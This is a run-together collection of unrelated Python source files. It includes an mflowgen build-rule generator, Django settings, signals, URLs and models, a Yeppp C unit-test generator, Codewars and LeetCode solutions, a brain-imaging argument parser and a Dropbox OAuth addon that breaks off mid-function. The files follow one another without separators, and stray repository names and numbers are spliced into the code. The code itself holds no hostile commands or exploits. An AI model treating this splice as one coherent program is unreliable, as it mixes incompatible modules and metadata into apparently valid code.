#--------------------------------------------------------------------- # Additional notes on customized backends #--------------------------------------------------------------------- # Using this method and a backend writer interface works for most use # cases. # # For more customization (e.g., comments, formatting, any additional # rules not easily hooked in here), we also keep track of two variables: # # - s.build_system_rules <- access this via s.get_all_rules() # - s.build_system_deps <- access this via s.get_all_deps() # # A backend writer can use these variables to customize the output # much more flexibly, but it is also much more complicated! # # The data is organized like this: # # s.build_system_rules[ 'step1' ] = { # 'directory' : { ... kwargs to create directory ... }, # 'collect-inputs' : { ... kwargs to collect inputs ... }, # 'execute' : { ... kwargs to execute commands ... }, # 'collect-outputs' : { ... kwargs to collect outputs ... }, # 'alias' : { ... kwargs to create alias ... }, # } # # The high-level build system dependencies are also captured. So for # example, 'step1' can create its directory only when previous dependent # 'step0' has finished creating an alias. The backend build system is in # charge of taking whatever the target is (e.g., stamp files) and adding # it to the dependencies list according to this high-level information. # # s.build_system_deps[ 'step1' ] = { # 'directory' : [ ( 'step0', 'alias' ) ] # 'collect-inputs' : [ ( 'step1', 'directory' ) ] # 'execute' : [ ( 'step1', 'collect-inputs' ) ], # 'collect-outputs' : [ ( 'step1', 'execute' ) ], # 'alias' : [ ( 'step1', 'collect-outputs' ) ], # } # def build( s ): # Setup s.setup() # Pass useful data to the backend writer s.w.save( s.order, s.build_dirs, s.step_dirs ) # Backend writer prologue s.w.gen_header() s.w.gen_prologue() # Keep track of build-system-specific dependency trackers backend_outputs = {} # Loop over all steps in topological order for i, step_name in enumerate( s.order ): step = s.g.get_step( step_name ) build_dir = s.build_dirs[ step_name ] build_id = s.build_ids[ step_name ] s.build_system_rules[ step_name ] = {} s.build_system_deps[ step_name ] = {} backend_outputs[ step_name ] = {} # Use the backend writer to generate the step header s.w.gen_step_header( step_name ) #................................................................... # directory #................................................................... s.w.gen_step_directory_pre() # Make the directory dependent on all source files step_template_dir = s.step_dirs[ step_name ] deps = [] #deps = get_files_in_dir( step_template_dir ) # Remove any broken symlinks from the dependency list deps_filtered = [] for f in deps: try: os.stat( f ) deps_filtered.append( f ) except OSError as e: pass deps = deps_filtered # Check if we are going to sandbox this step or symlink it sandbox = step.get_sandbox() # Rule # # - Remove the {dst} # - Copy the {src} to the {dst} # - This rule depends on {deps} # - {sandbox} True (copies src dir), False (symlinks src contents) # rule = { 'dst' : build_dir, 'src' : step_template_dir, 'deps' : deps, 'sandbox' : sandbox, } # Pull in any backend dependencies extra_deps = set() for edge in s.g.get_edges_i( step_name ): src_step_name, src_f = edge.get_src() for o in backend_outputs[src_step_name]['alias']: extra_deps.add( o ) extra_deps = list( extra_deps ) # Use the backend writer to generate the rule, and then grab any # backend dependencies t = s.w.gen_step_directory( extra_deps = extra_deps, **rule ) backend_outputs[step_name]['directory'] = t # Metadata for customized backends s.build_system_rules[step_name]['directory'] = rule s.build_system_deps[step_name]['directory'] = set() for edge in s.g.get_edges_i( step_name ): src_step_name, src_f = edge.get_src() s.build_system_deps[step_name]['directory'].add( ( src_step_name, 'alias' ) ) #................................................................... # collect-inputs #................................................................... # For each incoming edge, trace back and collect the input (i.e., # symlink the src step's output to this step's input). s.w.gen_step_collect_inputs_pre() # Pull in any backend dependencies extra_deps = backend_outputs[step_name]['directory'] # Metadata for customized backends s.build_system_rules[step_name]['collect-inputs'] = [] # Use the backend writer to generate rules for each input, and then # grab any backend dependencies backend_outputs[step_name]['collect-inputs'] = [] for edge in s.g.get_edges_i( step_name ): src_step_name, src_f = edge.get_src() dst_step_name, dst_f = edge.get_dst() link_src = s.build_dirs[ src_step_name ] + '/outputs/' + src_f link_dst = s.build_dirs[ dst_step_name ] + '/inputs/' + dst_f # Rule # # - Symlink the {src} to the {dst} # - This rule depends on {deps} # rule = { 'dst' : link_dst, 'src' : link_src, 'deps' : [], } t = s.w.gen_step_collect_inputs( extra_deps = extra_deps, **rule ) backend_outputs[step_name]['collect-inputs'] += t s.build_system_rules[step_name]['collect-inputs'].append( rule ) # Metadata for customized backends s.build_system_deps[step_name]['collect-inputs'] = set() s.build_system_deps[step_name]['collect-inputs'].add( ( step_name, 'directory' ) ) #................................................................... # execute #................................................................... # Executing the step just involves running the commands script saved # in the hidden metadata directory. s.w.gen_step_execute_pre() # Outputs and commands outputs = [ build_dir + '/outputs/' + f \ for f in step.all_outputs_execute() ] if not outputs: outputs = [ build_dir + '/execute-phony' ] phony = True else: phony = False meta_build_dir = s.metadata_dir + '/' + build_dir run_script = meta_build_dir + '/' + s.mflowgen_run debug_script = meta_build_dir + '/' + s.mflowgen_debug precond_script = meta_build_dir + '/' + s.mflowgen_precond postcond_script = meta_build_dir + '/' + s.mflowgen_postcond commands = ' && '.join([ # FIRST set pipefail so we get correct error status at the end 'set -o pipefail', # Step banner in big letters get_top_dir() \ + '/mflowgen/scripts/mflowgen-letters -c -t ' + step_name, # Copy the command script to the build_dir 'chmod +x {}'.format( run_script ), 'cp -f {} {}'.format( run_script, build_dir ), # Copy the debug script to the build_dir if it exists 'if [[ -e ' + debug_script + ' ]]; then' \ + ' chmod +x {} &&'.format( debug_script ) \ + ' cp -f {} {}; fi'.format( debug_script, build_dir ), # Copy the precondition script to the build_dir if it exists 'if [[ -e ' + precond_script + ' ]]; then' \ + ' chmod +x {} &&'.format( precond_script ) \ + ' cp -f {} {}; fi'.format( precond_script, build_dir ), # Copy the postcondition script to the build_dir if it exists 'if [[ -e ' + postcond_script + ' ]]; then' \ + ' chmod +x {} &&'.format( postcond_script ) \ + ' cp -f {} {}; fi'.format( postcond_script, build_dir ), # Go into the build directory 'cd ' + build_dir, # Run the precondition checker if it exists 'if [[ -e ' + s.mflowgen_precond + ' ]]; then' \ + ' ./{x} || exit 1; fi'.format( x=s.mflowgen_precond ), # Run the commands './{x} 2>&1 | tee {x}.log || exit 1'.format( x=s.mflowgen_run ), # Return to top so backends can assume we never changed directory 'cd ..', ]) # Rule # # - Run the {command} # - Generate the {outputs} # - This rule depends on {deps} # rule = { 'outputs' : outputs, 'command' : commands, 'deps' : [], 'phony' : phony, } # Pull in any backend dependencies extra_deps = set() for o in backend_outputs[step_name]['directory']: extra_deps.add( o ) for o in backend_outputs[step_name]['collect-inputs']: extra_deps.add( o ) extra_deps = list( extra_deps ) # Use the backend writer to generate the rule, and then grab any # backend dependencies t = s.w.gen_step_execute( extra_deps = extra_deps, **rule ) backend_outputs[step_name]['execute'] = t # Metadata for customized backends s.build_system_rules[step_name]['execute'] = rule s.build_system_deps[step_name]['execute'] = set() s.build_system_deps[step_name]['execute'].add( ( step_name, 'directory' ) ) s.build_system_deps[step_name]['execute'].add( ( step_name, 'collect-inputs' ) ) #................................................................... # collect-outputs #................................................................... # Outputs may be tagged or untagged in the YAML configuration: # # outputs: # - file1.txt : path/to/the/data.txt <-- tagged # - file2.txt <-- untagged # # Tagged outputs need to be symlinked to the 'outputs' directory. # Untagged outputs are assumed to be already in the 'outputs' # directory. # # Some backend build systems may need to process the untagged # outputs to build dependency edges (e.g., timestamping), so in this # section we collect rules for both tagged and untagged outputs. s.w.gen_step_collect_outputs_pre() # Pull in any backend dependencies extra_deps = backend_outputs[step_name]['execute'] # Metadata for customized backends s.build_system_rules[step_name]['collect-outputs'] = { \ 'tagged' : [], 'untagged' : [], } # Use the backend writer to generate rules for each tagged output, # and then grab any backend dependencies backend_outputs[step_name]['collect-outputs'] = [] for o in step.all_outputs_tagged(): link_src = build_dir + '/' + o.values()[0] link_dst = build_dir + '/outputs/' + o.keys()[0] # Rule # # - Symlink the {src} to the {dst} # - This rule depends on {deps} # rule = { 'dst' : link_dst, 'src' : link_src, 'deps' : [], } t = s.w.gen_step_collect_outputs_tagged( extra_deps=extra_deps, **rule ) backend_outputs[step_name]['collect-outputs'] += t d = s.build_system_rules[step_name]['collect-outputs'] d['tagged'].append( rule ) # Do whatever is necessary to the untagged outputs for o in step.all_outputs_untagged(): f = build_dir + '/outputs/' + o # Rule # # - Do whatever is necessary to the untagged output {f} # - This rule depends on {deps} # rule = { 'f' : f, 'deps' : [], } t = s.w.gen_step_collect_outputs_untagged( extra_deps=extra_deps, **rule ) backend_outputs[step_name]['collect-outputs'] += t d = s.build_system_rules[step_name]['collect-outputs'] d['untagged'].append( rule ) # Metadata for customized backends s.build_system_deps[step_name]['collect-outputs'] = set() s.build_system_deps[step_name]['collect-outputs'].add( ( step_name, 'execute' ) ) #................................................................... # post-conditions #................................................................... # Here we assert post-conditions (if any) s.w.gen_step_post_conditions_pre() # Commands commands = ' && '.join([ # Go into the build directory 'cd ' + build_dir, # Run the postcondition checker if it exists 'if [[ -e ' + s.mflowgen_postcond + ' ]]; then' \ + ' ./{x} || exit 1; fi'.format( x=s.mflowgen_postcond ), # Return to top so backends can assume we never changed directory 'cd ..', ]) # Rule # # - Run the {command} # - This rule depends on {deps} # rule = { 'command' : commands, 'deps' : [], } # Pull in any backend dependencies extra_deps = set() for o in backend_outputs[step_name]['execute']: extra_deps.add( o ) for o in backend_outputs[step_name]['collect-outputs']: extra_deps.add( o ) extra_deps = list( extra_deps ) # Use the backend writer to generate the rule, and then grab any # backend dependencies t = s.w.gen_step_post_conditions( extra_deps = extra_deps, **rule ) backend_outputs[step_name]['post-conditions'] = t # Metadata for customized backends s.build_system_rules[step_name]['post-conditions'] = rule s.build_system_deps[step_name]['post-conditions'] = set() s.build_system_deps[step_name]['post-conditions'].add( ( step_name, 'execute' ) ) s.build_system_deps[step_name]['post-conditions'].add( ( step_name, 'collect-outputs' ) ) #................................................................... # alias #................................................................... # Here we create nice names for building this entire step s.w.gen_step_alias_pre() # Pull in any backend dependencies extra_deps = set() for o in backend_outputs[step_name]['execute']: extra_deps.add( o ) for o in backend_outputs[step_name]['collect-outputs']: extra_deps.add( o ) for o in backend_outputs[step_name]['post-conditions']: extra_deps.add( o ) extra_deps = list( extra_deps ) # Metadata for customized backends s.build_system_rules[step_name]['alias'] = [] # Use the backend writer to generate rules for each input, and then # grab any backend dependencies backend_outputs[step_name]['alias'] = [] # Rule # # - Create an alias called {alias} for this step # - This rule depends on {deps} # rule = { 'alias' : step_name, 'deps' : [], } t = s.w.gen_step_alias( extra_deps = extra_deps, **rule ) backend_outputs[step_name]['alias'] += t s.build_system_rules[step_name]['alias'].append( rule ) # Rule # # - Create an alias called {alias} for this step # - This rule depends on {deps} # rule = { 'alias' : build_id, 'deps' : [], } t = s.w.gen_step_alias( extra_deps = extra_deps, **rule ) backend_outputs[step_name]['alias'] += t s.build_system_rules[step_name]['alias'].append( rule ) # Metadata for customized backends s.build_system_deps[step_name]['alias'] = set() s.build_system_deps[step_name]['alias'].add( ( step_name, 'execute' ) ) s.build_system_deps[step_name]['alias'].add( ( step_name, 'collect-outputs' ) ) s.build_system_deps[step_name]['alias'].add( ( step_name, 'post-conditions' ) ) #................................................................... # debug #................................................................... # Generate the debug commands if they are defined in the YAML. s.w.gen_step_debug_pre() debug_commands = step.get_debug_commands() if debug_commands: commands = ' && '.join([ 'cd ' + build_dir, './{x} 2>&1 | tee {x}.log'.format( x=s.mflowgen_debug ) ]) # Rule # # - Run the {command} # - Generate the {target} # - Use {build_id} to guarantee uniqueness # debug_target = 'debug-' + step_name rule = { 'target' : debug_target, 'command' : commands, 'build_id' : build_id, } s.w.gen_step_debug( **rule ) s.build_system_rules[step_name]['debug'] = [ rule ] # Rule # # - Create an alias called {alias} for this step # - This rule depends on {deps} # rule = { 'alias' : 'debug-' + build_id, 'deps' : [ debug_target ], 'extra_deps' : [], } s.w.gen_step_alias( **rule ) else: s.build_system_rules[step_name]['debug'] = [] # Now that all steps are done... # Call the backend writer's epilogue s.w.gen_epilogue() #----------------------------------------------------------------------- # Backend API #----------------------------------------------------------------------- # The backend targets a specific build system (e.g., make, ninja) and # uses this API to query what commands to generate. def get_order( s ): return s.order def get_build_dir( s, step_name ): return s.build_dirs[step_name] def get_rules( s, step_name, stage ): return s.build_system_rules[step_name][stage] def get_deps( s, step_name, stage ): return s.build_system_deps[step_name][stage] def get_all_rules( s ): return s.build_system_rules def get_all_deps( s ): return s.build_system_deps #!/usr/bin/env python # -*- coding: utf-8 -*- gettext = lambda s: s import os HAYSTACK_CONNECTIONS = { 'default': { 'ENGINE': 'haystack.backends.solr_backend.SolrEngine', 'URL': 'http://localhost:9001/solr/default', 'TIMEOUT': 60 * 5, 'INCLUDE_SPELLING': True, 'BATCH_SIZE': 100, 'EXCLUDED_INDEXES': ['thirdpartyapp.search_indexes.BarIndex'], }, 'en': { 'ENGINE': 'haystack.backends.solr_backend.SolrEngine', 'URL': 'http://my-solr-server/solr/my-site-en/', 'TIMEOUT': 60 * 5, 'INCLUDE_SPELLING': True, 'BATCH_SIZE': 100, }, } HELPER_SETTINGS = { 'TEMPLATE_DIRS': ('aldryn_search/tests_data/templates/',), 'CMS_TEMPLATES': ( ('fullwidth.html', 'Fullwidth'), ('page.html', 'Normal page'), ('test.html', 'Normal page2'), ), 'ALLOWED_HOSTS': ['localhost'], 'CMS_LANGUAGES': {1: [{'code': 'en', 'name': 'English'}]}, 'LANGUAGES': (('en', 'English'),), 'LANGUAGE_CODE': 'en', #'TEMPLATE_LOADERS': ('aldryn_search.tests.FakeTemplateLoader',), 'HAYSTACK_CONNECTIONS': HAYSTACK_CONNECTIONS, 'CMS_PERMISSION': True, 'CMS_PLACEHOLDER_CONF': { 'content': {}, }, 'PLACEHOLDERS_SEARCH_LIST': { '*': {}, 'testpage': { 'include': ['content'], }, 'testpage2': {}, 'testpage3': { 'exclude': ['content', 'hidden_content'] }, 'testpage4': { 'include': ['content'], 'exclude': ['hidden_content'] }, 'testpage5': { 'include': ['hidden_content'], 'exclude': ['content'] }, 'testpage6': { 'include': ['hidden_content', 'content'], }, 'testpage7': { 'include': ['hidden_content'], } }, } def run(): from djangocms_helper import runner runner.cms('aldryn_search') if __name__ == '__main__': run() 1-10 #!/usr/bin/env python import yaml import argparse import os from common.Function import Function def generate_unit_tests(path, function_list): with open(path, "w") as output: output.write( """ #include #include #include #include #include #include #include #include #include #include #ifdef YEP_WINDOWS_OS #include #define YEP_ESCAPE_NORMAL_COLOR "" #define YEP_ESCAPE_RED_COLOR "" #define YEP_ESCAPE_GREEN_COLOR "" #define YEP_ESCAPE_YELLOW_COLOR "" #else #define YEP_ESCAPE_NORMAL_COLOR "\\x1B[0m" #define YEP_ESCAPE_RED_COLOR "\\x1B[31m" #define YEP_ESCAPE_GREEN_COLOR "\\x1B[32m" #define YEP_ESCAPE_YELLOW_COLOR "\\x1B[33m" #endif static const char* getMicroarchitectureName(YepCpuMicroarchitecture microarchitecture) { const YepSize bufferSize = 1024; static char buffer[bufferSize]; YepSize bufferLength = bufferSize - 1; YepStatus status = yepLibrary_GetString(YepEnumerationCpuMicroarchitecture, microarchitecture, YepStringTypeDescription, buffer, &bufferLength); assert(status == YepStatusOk); buffer[bufferLength] = '\\0'; return buffer; } static void reportFailedTest(const char* functionName, YepCpuMicroarchitecture microarchitecture) { #ifdef YEP_WINDOWS_OS CONSOLE_SCREEN_BUFFER_INFO bufferInfo; ::GetConsoleScreenBufferInfo(::GetStdHandle(STD_OUTPUT_HANDLE), &bufferInfo); printf("%s (%s): ", functionName, getMicroarchitectureName(microarchitecture)); fflush(stdout); ::SetConsoleTextAttribute(::GetStdHandle(STD_OUTPUT_HANDLE), FOREGROUND_RED | FOREGROUND_INTENSITY); printf("FAILED\\n"); fflush(stdout); ::SetConsoleTextAttribute(::GetStdHandle(STD_OUTPUT_HANDLE), bufferInfo.wAttributes); #else printf("%s (%s): %sFAILED%s\\n", functionName, getMicroarchitectureName(microarchitecture), YEP_ESCAPE_RED_COLOR, YEP_ESCAPE_NORMAL_COLOR); #endif } static void reportFailedTest(const char* functionName, YepCpuMicroarchitecture microarchitecture, float ulpError) { #ifdef YEP_WINDOWS_OS CONSOLE_SCREEN_BUFFER_INFO bufferInfo; ::GetConsoleScreenBufferInfo(::GetStdHandle(STD_OUTPUT_HANDLE), &bufferInfo); printf("%s (%s): ", functionName, getMicroarchitectureName(microarchitecture)); fflush(stdout); ::SetConsoleTextAttribute(::GetStdHandle(STD_OUTPUT_HANDLE), FOREGROUND_RED | FOREGROUND_INTENSITY); printf("FAILED"); fflush(stdout); ::SetConsoleTextAttribute(::GetStdHandle(STD_OUTPUT_HANDLE), bufferInfo.wAttributes); printf(" (%f ULP)\\n", ulpError); #else printf("%s (%s): %sFAILED%s (%f ULP)\\n", functionName, getMicroarchitectureName(microarchitecture), YEP_ESCAPE_RED_COLOR, YEP_ESCAPE_NORMAL_COLOR, ulpError); #endif } static void reportPassedTest(const char* functionName, YepCpuMicroarchitecture microarchitecture) { #ifdef YEP_WINDOWS_OS CONSOLE_SCREEN_BUFFER_INFO bufferInfo; ::GetConsoleScreenBufferInfo(::GetStdHandle(STD_OUTPUT_HANDLE), &bufferInfo); printf("%s (%s): ", functionName, getMicroarchitectureName(microarchitecture)); fflush(stdout); ::SetConsoleTextAttribute(::GetStdHandle(STD_OUTPUT_HANDLE), FOREGROUND_GREEN | FOREGROUND_INTENSITY); printf("PASSED\\n"); fflush(stdout); ::SetConsoleTextAttribute(::GetStdHandle(STD_OUTPUT_HANDLE), bufferInfo.wAttributes); #else printf("%s (%s): %sPASSED%s\\n", functionName, getMicroarchitectureName(microarchitecture), YEP_ESCAPE_GREEN_COLOR, YEP_ESCAPE_NORMAL_COLOR); #endif } static void reportSkippedTest(const char* functionName, YepCpuMicroarchitecture microarchitecture) { #ifdef YEP_WINDOWS_OS CONSOLE_SCREEN_BUFFER_INFO bufferInfo; ::GetConsoleScreenBufferInfo(::GetStdHandle(STD_OUTPUT_HANDLE), &bufferInfo); printf("%s (%s): ", functionName, getMicroarchitectureName(microarchitecture)); fflush(stdout); ::SetConsoleTextAttribute(::GetStdHandle(STD_OUTPUT_HANDLE), FOREGROUND_RED | FOREGROUND_GREEN | FOREGROUND_INTENSITY); printf("SKIPPED\\n"); fflush(stdout); ::SetConsoleTextAttribute(::GetStdHandle(STD_OUTPUT_HANDLE), bufferInfo.wAttributes); #else printf("%s (%s): %sSKIPPED%s\\n", functionName, getMicroarchitectureName(microarchitecture), YEP_ESCAPE_YELLOW_COLOR, YEP_ESCAPE_NORMAL_COLOR); #endif } """) for function in function_list: output.write(function.unit_test) output.write("\n\n") output.write("int main (int argc, char **argv) {\n") boolean_names = [ "test" + "_".join(func.name.split("_")[1:]) for func in function_list ] for name in boolean_names: output.write(" YepBoolean {} = YepBooleanFalse;\n".format(name)) output.write(" if (argc == 1) {\n") for name in boolean_names: output.write(" {} = YepBooleanTrue;\n".format(name)) output.write( """ } else { for (int i = 1; i < argc; i++) { """) else_part = "" for name in boolean_names: output.write( """ {}if (strcmp(argv[i], \"{}\") == 0) {{ {} = YepBooleanTrue; }} """.format(else_part, "_".join(name.split("_")[1:]), name)) else_part = "else " output.write(" }\n") output.write(" }\n") output.write( """ YepStatus status = _yepLibrary_InitCpuInfo(); assert(status == YepStatusOk); Yep64u supportedIsaFeatures, supportedSimdFeatures, supportedSystemFeatures; status = yepLibrary_GetCpuIsaFeatures(&supportedIsaFeatures); assert(status == YepStatusOk); status = yepLibrary_GetCpuSimdFeatures(&supportedSimdFeatures); assert(status == YepStatusOk); status = yepLibrary_GetCpuSystemFeatures(&supportedSystemFeatures); assert(status == YepStatusOk); Yep32s failedTests = 0; """) for name in boolean_names: output.write( """ if YEP_LIKELY({}) failedTests += {}(supportedIsaFeatures, supportedSimdFeatures, supportedSystemFeatures); """.format(name, "Test_{}".format(name[4:]))) output.write(" return failedTests;\n}") if __name__ == "__main__": parser = argparse.ArgumentParser(description="Unit Test Generator") parser.add_argument("-o", dest="output", required=True, help="Output file name") parser.add_argument("input", nargs=1) parser.add_argument("-op", dest="op", required=True, help="Operation to generate tests for") options = parser.parse_args() with open(options.input[0], "r") as specification_file: yaml_data = yaml.load(specification_file) module = yaml_data["module"] # Iterate through the operations of the module func_list = [] for op_set in yaml_data["functions"]: op = op_set["operation"] if op != options.op: continue # Skip the operations that we don't care about for func_group in op_set["function_groups"]: for func in func_group["group"]: func_list.append(Function(func, func_group)) generate_unit_tests(options.output, func_list) katas/kyu_6/Squares_in_a_Rectangle.py0 # https://www.codewars.com/kata/5a62da60d39ec5d947000093/ ''' Instructions : A rectangle can be split up into a grid of 1x1 squares, the amount of which being equal to the product of the two dimensions of the rectangle. Depending on the size of the rectangle, that grid of 1x1 squares can also be split up into larger squares, for example a 3x2 rectangle has a total of 8 squares, as there are 6 distinct 1x1 squares, and two possible 2x2 squares. A 4x3 rectangle contains 20 squares. Your task is to write a function `findSquares` that returns the total number of squares for any given rectangle, the dimensions of which being given as two integers with the first always being equal to or greater than the second. ''' def findSquares(m, n): if n < m: m, n = n, m return ((m * (m + 1) * (2 * m + 1) / 6 + (n - m) * m * (m + 1) / 2)) import argparse def extraction_parser(): parser = argparse.ArgumentParser( formatter_class=argparse.ArgumentDefaultsHelpFormatter ) parser.add_argument( dest="img_filepath", type=str, help="Path to brain volume (.nii) data", ) parser.add_argument( dest="registration_folder", type=str, help="Path to cellfinder registration folder", ) parser.add_argument( "-od", "--output-directory", dest="output_directory", type=str, default=None, help="Path to directory where the log will be saved.", ) parser.add_argument( "-ow", "--overwrite", dest="overwrite", type=bool, default=True, help="If false files will not be overwritten.", ) parser.add_argument( "-o", "--obj-path", dest="obj_path", type=str, default=None, help="Path to output .obj file. Will default to the image directory.", ) parser.add_argument( "-k", "--gaussian-kernel", dest="gaussian_kernel", type=float, default=2, help="Float, size of kernel for gaussian smoothing (x,y directions).", ) parser.add_argument( "--gaussian-kernel-z", dest="gaussian_kernel_z", type=float, default=6, help="Float, size of kernel for gaussian smoothing (zdirections).", ) parser.add_argument( "-pt", "--percentile_threshold", dest="percentile_threshold", type=float, default=99.995, help="Float in range [0, 100]. The percentile number of pixel " "intensity values for tresholding", ) parser.add_argument( "-tt", "--treshold-type", dest="threshold_type", type=str, default="otsu", help="'otsu' or 'percentile'. Determines how the threshold " "value is computed", ) parser.add_argument( "-or", "--overwrite-registration", dest="overwrite_registration", type=str, default="False", help="If false skip running again the registration", ) parser.add_argument( "--debug", dest="debug", action="store_true", help="Debug mode. Will increase verbosity of logging and save all " "intermediate files for diagnosis of software issues.", ) parser.add_argument( "--save-log", dest="save_log", action="store_true", help="Save logging to file (in addition to logging to terminal).", ) return parser 0 #signal fired after an obj is saved in this cas when a user is created from django.db.models.signals import post_save #user to sender the signal from django.contrib.auth.models import User #reciever of the signal from django.dispatch import receiver from .models import Profile @receiver(post_save,sender=User) def create_profile(sender,instance,created,**kwargs): ''' post_save:is the signal that is fired after and object is saved User:model is the sender of the signal receiver:is the create profile function that fetches the signal and performs some task instance:is the instance of User class created : if user was created Profile.objects.create(user=instance):create a profile obj with the instance of the user that was created ''' if created: Profile.objects.create(user=instance) @receiver(post_save,sender=User) def save_profile(sender,instance,**kwargs): ''' save profile once a user is saved ''' instance.profile.save() pennomi/comicscomics/urls.py from django.conf import settings from django.contrib import admin from django.urls import path, re_path from django.conf.urls.static import static from apps.comics import views as comics_views urlpatterns = [ path('', comics_views.ComicsIndexView.as_view(), name='index'), path('admin/', admin.site.urls), path('ads.txt', comics_views.AdsTxt.as_view(), name='ads-txt'), # path('robots.txt', comics_views.RobotsTxtView.as_view(), name='robots'), # path('sitemap.xml', comics_views.SitemapView.as_view(), name='sitemap'), # Comic root path('', comics_views.ReaderRedirectView.as_view(), name='reader-redirect'), path('comic/', comics_views.ReaderRedirectView.as_view(), name='reader-redirect'), path('comic/random/', comics_views.RandomReaderRedirectView.as_view(), name='random-reader-redirect'), # Legacy redirects re_path(r'^swords/', comics_views.LegacyPageRedirectView.as_view(), name='legacy-page-redirect'), # Reader path('comic/feed/', comics_views.FeedView.as_view(), name='feed'), # RSS Feed path('comic/data/', comics_views.ComicAjaxView.as_view(), name='comic-metadata'), path('comic/data//', comics_views.PageAjaxView.as_view(), name='page-metadata'), path('comic//', comics_views.ReaderView.as_view(), name='reader'), # Testing path('test/', comics_views.TestView.as_view(), name='test'), # Tag Wiki Pages path('archive/', comics_views.ArchiveView.as_view(), name='archive-index'), path('archive/pages/', comics_views.PageListView.as_view(), name='archive-pages'), path('archive//', comics_views.TagTypeView.as_view(), name='archive-tagtype'), path('archive///', comics_views.TagView.as_view(), name='archive-tag'), # Miscellaneous path('community/', comics_views.CommunityView.as_view(), name='community'), path('500/', comics_views.comic_500_view), ] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT) handler404 = comics_views.comic_404_view handler500 = comics_views.comic_500_view 1-10 #coding:utf-8 import sys if sys.getdefaultencoding() != 'utf-8': reload(sys) sys.setdefaultencoding('utf-8') from HistoryTrading import HistoryTrading from RealTimeTrading import RealTimeTrading from TestEngine import TestEngine __all__ = ['RealTimeTrading', 'HistoryTrading', 'TestEngine']pflun/learningAlgorithmsbuildTree.py # -*- coding: utf-8 -*- class TreeNode(object): def __init__(self, x): self.val = x self.left = None self.right = None class Solution(object): def buildTree(self, preorder, inorder): if len(preorder) == 0 or len(inorder) == 0 or len(preorder) != len(inorder): return [] res = self.buildTreeHelper(preorder, inorder, 0, 0, len(preorder) - 1) return res def buildTreeHelper(self, preorder, inorder, pre_st, in_st, in_end): if pre_st > len(preorder) or in_st > in_end: return None # first node in preorder is root root = TreeNode(preorder[pre_st]) i = in_st # find root in inorder, root is the first element in preorder while(i <= in_end): if inorder[i] == preorder[pre_st]: break i += 1 # left: pre start is the next element in preorder, i is curr root in inorder so in_end is at the left position of i root.left = self.buildTreeHelper(preorder, inorder, pre_st + 1, in_st, i - 1) # right: pre start is curr root (pre_st) + len(left child in inorder) + 1 (画图可见) root.right = self.buildTreeHelper(preorder, inorder, pre_st + (i - in_st + 1), i + 1, in_end) return root # My Accepted Solution class Solution2(object): def buildTree(self, preorder, inorder): if len(preorder) == 0 or len(inorder) == 0: return None curr = TreeNode(preorder[0]) index = inorder.index(preorder[0]) curr.left = self.buildTree(preorder[1:len(inorder[0:index]) + 1], inorder[0:index]) curr.right = self.buildTree(preorder[len(inorder[0:index]) + 1:], inorder[index + 1:]) return currmysite/myapp/models.py from django.db import models from django.contrib.auth.models import User from django.contrib.admin.widgets import AdminDateWidget, AdminTimeWidget, AdminSplitDateTime from django.forms import TextInput, Textarea # Create your models here. class SuggestionModel(models.Model): suggestion = models.CharField(max_length=240) author = models.ForeignKey(User, on_delete=models.CASCADE) #new date_input = models.DateField(null=True) time_input = models.TimeField(null=True) def __str__(self): return self.suggestion class CommentModel(models.Model): comment = models.CharField(max_length=240) #new author = models.ForeignKey(User, on_delete=models.CASCADE) #new suggestion = models.ForeignKey(SuggestionModel, on_delete=models.CASCADE) def __str__(self): #new return self.comment import httplib as http import logging import os from oauthlib.common import generate_token from addons.base.models import (BaseOAuthNodeSettings, BaseOAuthUserSettings, BaseStorageAddon) from django.db import models from dropbox.dropbox import Dropbox from dropbox.exceptions import ApiError, DropboxException from dropbox.files import FolderMetadata from dropbox.client import DropboxOAuth2Flow from flask import request from framework.auth import Auth from framework.exceptions import HTTPError from framework.sessions import session from osf.models.external import ExternalProvider from osf.models.files import File, Folder, BaseFileNode from addons.base import exceptions from addons.dropbox import settings from addons.dropbox.serializer import DropboxSerializer from website.util import api_v2_url, web_url_for logger = logging.getLogger(__name__) class DropboxFileNode(BaseFileNode): _provider = 'dropbox' class DropboxFolder(DropboxFileNode, Folder): pass class DropboxFile(DropboxFileNode, File): pass class Provider(ExternalProvider): name = 'Dropbox' short_name = 'dropbox' client_id = settings.DROPBOX_KEY client_secret = settings.DROPBOX_SECRET # Explicitly override auth_url_base as None -- DropboxOAuth2Flow handles this for us auth_url_base = None callback_url = None handle_callback = None @property def oauth_flow(self): if 'oauth_states' not in session.data: session.data['oauth_states'] = {} if self.short_name not in session.data['oauth_states']: session.data['oauth_states'][self.short_name] = { 'state': generate_token() } return DropboxOAuth2Flow( self.client_id, self.client_secret, redirect_uri=web_url_for( 'oauth_callback', service_name=self.short_name, _absolute=True ), session=session.data['oauth_states'][self.short_name], csrf_token_session_key='state' ) @property def auth_url(self): ret = self.oauth_flow.start('force_reapprove=true') session.save() return ret # Overrides ExternalProvider def auth_callback(self, user): # TODO: consider not using client library during auth flow try: access_token, dropbox_user_id, url_state = self.oauth_flow.finish(request.values) except (DropboxOAuth2Flow.NotApprovedException, DropboxOAuth2Flow.BadStateException): # 1) user cancelled and client library raised exc., or # 2) the state was manipulated, possibly due to time. # Either way, return and display info about how to properly connect. return except (DropboxOAuth2Flow.ProviderException, DropboxOAuth2Flow.CsrfException): raise HTTPError(http.FORBIDDEN) except DropboxOAuth2Flow.BadRequestException: raise HTTPError(http.BAD_REQUEST) self.client = Dropbox(access_token) info = self.client.users_get_current_account() return self._set_external_account( user, { 'key': access_token, 'provider_id': info.account_id, 'display_name': info.name.display_name, } ) class UserSettings(BaseOAuthUserSettings): """Stores user-specific dropbox information. token. """ oauth_provider = Provider serializer = DropboxSerializer def revoke_remote_oauth_access(self, external_account): """Overrides default behavior during external_account deactivation. Tells Dropbox to remove the grant for the GakuNin RDM associated with this account. """ client = Dropbox(external_account.oauth_key) try: client.auth_token_revoke() except DropboxException: pass class NodeSettings(BaseOAuthNodeSettings, BaseStorageAddon): oauth_provider = Provider serializer = DropboxSerializer folder = models.TextField(null=True, blank=True) user_settings = models.ForeignKey(UserSettings, null=True, blank=True, on_delete=models.CASCADE) _api = None @property def api(self): """authenticated ExternalProvider instance""" if self._api is None: self._api = Provider(self.external_account) return self._api @property def folder_id(self): return self.folder @property def folder_name(self): return os.path.split(self.folder or '')[1] or '/ (Full Dropbox)' if self.folder else None @property def folder_path(self): return self.folder @property def display_name(self): return '{0}: {1}'.format(self.config.full_name, self.folder) def clear_settings(self): self.folder = None def get_folders(self, **kwargs): folder_id = kwargs.get('folder_id') if folder_id is None: return [{ 